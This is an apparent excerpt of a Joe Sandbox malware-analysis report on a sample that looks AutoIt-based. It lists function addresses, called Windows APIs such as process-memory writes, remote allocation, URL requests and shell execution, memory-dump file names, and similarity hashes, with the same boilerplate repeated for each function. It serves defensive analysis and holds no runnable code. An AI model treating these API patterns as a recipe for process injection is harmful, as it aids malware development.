                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                                                                                                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                                                                                                Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                                                                                                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                                                                                                Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                                                                                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                                                                                                                Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                • API String ID: 708495834-557222456
                                                                                                                                                                                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                                                                                                Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                                                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                                                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                                                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                                                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                                                                                                Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \$]$h
                                                                                                                                                                                                                • API String ID: 4104443479-3262404753
                                                                                                                                                                                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                                                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                                                                                                                Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                • API String ID: 2417854910-1426351568
                                                                                                                                                                                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                                                                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                                                                                                Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3705125965-3916222277
                                                                                                                                                                                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                                                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                                                                                                Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                                                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                                                                                                Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                                                                                                Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                                                                                                                                • API String ID: 145871493-4132174516
                                                                                                                                                                                                                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                                                                                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                                                                                                Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                                                                                                                Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                Download Yara Rule
